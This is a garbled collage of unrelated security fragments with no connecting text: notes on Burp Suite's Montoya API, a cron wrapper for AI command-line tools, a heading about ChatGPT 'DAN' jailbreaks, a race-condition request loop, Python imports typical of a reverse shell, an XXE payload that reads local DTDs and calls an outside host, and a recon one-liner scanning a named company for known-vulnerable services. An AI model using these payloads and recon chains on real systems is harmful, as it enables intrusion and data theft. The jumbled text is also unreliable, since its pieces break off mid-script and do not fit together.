srand2

Burp Suite’s Montoya API exposes a small utility that ranks a collection of HTTP request/response pairs by a custom anomaly metric. The official Javadoc describes the entry point but not the math behind the score.

Each response is summarized into a fixed set of analyzed attributes. Each attribute has a type (what aspect of the response it captures) and an integer value that encodes which “bucket” or variant that response falls into for that aspect. Think of the integer as an opaque label: two responses with the same label for STATUS_CODE are treated as identical for that feature.

The Montoya enum AttributeType (see reference below) lists every dimension that can participate. Together they cover status, important headers, cookies, body fingerprints, HTML structure, word counts, forms, and more. Only attributes that vary across a batch of request and response pairs are used in the score.

Running AI CLI Tools with Cron for 5-Hour Usage Windows

The Challenge

Anthropic and OpenAI enforce a 5-hour usage window - once I make my first request, I have 5 hours fixed usage before the window expires. This meant:

❌ Unpredictable availability - window could expire mid-project or at random times during the work day
❌ Frustration when usage windows expire at unopportune times
❌ Consistent work schedule and usage window planning

Chat GPT "DAN" (and other "Jailbreaks")

	#!/bin/bash
	# AI CLI tools wrapper for scheduled activation of usage windows
	# Outputs JSON for machine-readable logs with human-friendly summaries

	# ============================================================================
	# CONFIGURATION - Update these values for your environment
	# ============================================================================

	# System paths
	USER_HOME="/home/code"

	// This will use the single-packet attack for HTTP/2, and last-byte synchronisation for HTTP/1
	int NUMBER_OF_REQUESTS = 10;
	var reqs = new ArrayList<HttpRequest>();
	for (int i = 0; i < NUMBER_OF_REQUESTS; i++) {
	reqs.add(requestResponse.request());
	}

	var responses = api().http().sendRequests(reqs);
	var codes = responses.stream().map(HttpRequestResponse::response).filter(Objects::nonNull).map(HttpResponse::statusCode).toList();
	logging().logToOutput(codes);

	from distutils.log import error
	import sys, socket,os,pty
	from django.conf import settings
	from django.urls import include, re_path
	from django.http import HttpResponse

	settings.configure(
	DEBUG=True,
	ROOT_URLCONF=__name__
	)

	#!/bin/env python3

	import argparse
	import datetime
	import re
	import sys
	import uuid

	###############################################################################
	# Based off of Daniel Thatcher's guid tool

	#pip install ecdsa
	#
	import base64
	import hashlib
	from hashlib import sha256
	import hmac

	from ecdsa.ecdsa import Signature, generator_256

	from ecdsa import VerifyingKey, NIST256p

	<!DOCTYPE doc [
	<!ENTITY % local_dtd SYSTEM "file:///C:\Windows\System32\wbem\xml\cim20.dtd">
	<!ENTITY % SuperClass '>
	<!ENTITY % file SYSTEM "http://example.com:9200/_cat/indices">
	<!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file://test/#%file;'>">
	%eval;
	%error;
	<!ENTITY test "test"'
	>
	%local_dtd;

	curl https://www.cisa.gov/sites/default/files/feeds/known_exploited_vulnerabilities.json \|jq -r '.vulnerabilities[].cveID' > cves.txt

	subfinder -d tesla.com -silent \|dnsx -silent -a -resp-only \|sort -u \|xargs -n1 -P 1500 -I% curl -s http://networktools.nl/whois/$url% \|grep "CIDR" \|cut -d : -f2 \|tr , "\n"\| awk '{$1=$1};1' \|sort -u \|egrep -v "/8\|/9\|/10\|/11\|/12\|/13\|/14\|/15\|/16" \|while read ip ;do whois -h whois.cymru.com " -v $ip" ;done \|grep -v "BGP Prefix" \|cut -d '\|' -f3 \|awk '{$1=$1};1' \|sort -u \|cidr2ip \|sort -u \|nrich - \|grep -B4 -f cves.txt \| tee shodan.txt; slackcat --channel bugbounty --filename shodan.txt